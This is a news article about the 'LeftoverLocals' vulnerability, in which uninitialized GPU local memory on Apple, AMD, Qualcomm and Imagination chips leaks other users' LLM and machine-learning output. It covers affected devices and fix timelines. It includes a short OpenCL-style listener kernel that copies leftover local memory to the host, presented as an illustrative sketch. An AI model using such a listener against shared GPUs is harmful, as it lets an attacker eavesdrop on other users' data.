Apple & AMD GPUs using AI at risk of being spied on in shocking vulnerability
A new vulnerability has revealed that machine learning and large language model workloads running on Apple, AMD, Qualcomm, and Imagination GPUs could be at risk of having their outputs spied on by attackers.
If CES 2024 is anything to go by, artificial intelligence is all the rage, ever since the advent of ChatGPT brought large language models (LLMs) and machine learning (ML) to the forefront of the industry. Manufacturers like Nvidia have reached unbelievable valuations on the back of this technological trend. But a new vulnerability could expose the outputs of millions of devices across the globe.
As seen on the Trail of Bits blog, a vulnerability dubbed “LeftoverLocals” could expose users of LLM or ML applications by letting an attacker read leftover data from GPU local memory. This would allow an attacker to listen in on another user’s session and recreate its output, potentially reconstructing an entire response.
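In broad strokes, the attack works because local (on-chip) memory on affected GPUs isn’t cleared between workloads: an attacker’s “listener” kernel can simply declare a local-memory buffer and copy out its uninitialized contents, which may still hold values written by a victim’s earlier kernel. Here is a rough, non-runnable sketch in OpenCL-style C; all names and sizes are illustrative, not Trail of Bits’ actual proof-of-concept:

```c
// Illustrative sketch only: dump whatever values are left in GPU local
// memory after a previous (victim) kernel ran on the same compute unit.
#define LM_SIZE 4096  // hypothetical local-memory size, in floats

__kernel void listener(__global float *dump) {
    // Declared but deliberately never initialized; on vulnerable GPUs
    // this region may still contain the victim's leftover data.
    __local float leftovers[LM_SIZE];

    for (int i = get_local_id(0); i < LM_SIZE; i += get_local_size(0)) {
        // Copy the uninitialized ("leftover") values to host-visible memory.
        dump[get_group_id(0) * LM_SIZE + i] = leftovers[i];
    }
}
```

On patched drivers or unaffected hardware, the buffer reads back as zeros or garbage; on vulnerable GPUs, it can contain the victim’s data, such as intermediate values from an LLM’s computation.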
The vulnerability was first identified in September 2023 and reported to the CERT Coordination Center, which brought affected manufacturers together and made them aware of the issue.
Affected manufacturers
The vulnerability potentially affects millions of devices using the impacted chips, most notably from Apple. The issue was disclosed to the company, with devices like the iPad Air 3 and M2 MacBook Air among those affected. However, systems using newer silicon, such as the iPhone 15, any device with an A17 chip, and the M3, contain fixes.
AMD GPUs across the company’s entire product stack are affected. However, AMD plans to mitigate the issue with driver updates beginning in March 2024.
Some Qualcomm devices are also affected, but the company has confirmed that it is working on a fix: “We encourage end users to apply security updates as they become available from their device makers.”
Google has also confirmed that Imagination GPUs are affected, but a fix was issued for customers in December 2023.
Nvidia and Arm devices, however, remain unaffected by the vulnerability.
Considering the sheer number of devices affected, this GPU listening vulnerability highlights that machine learning applications have not undergone the same rigorous security testing as many other kinds of software. A fast-evolving field creates the perfect breeding ground for vulnerabilities like this in applications like Stable Diffusion.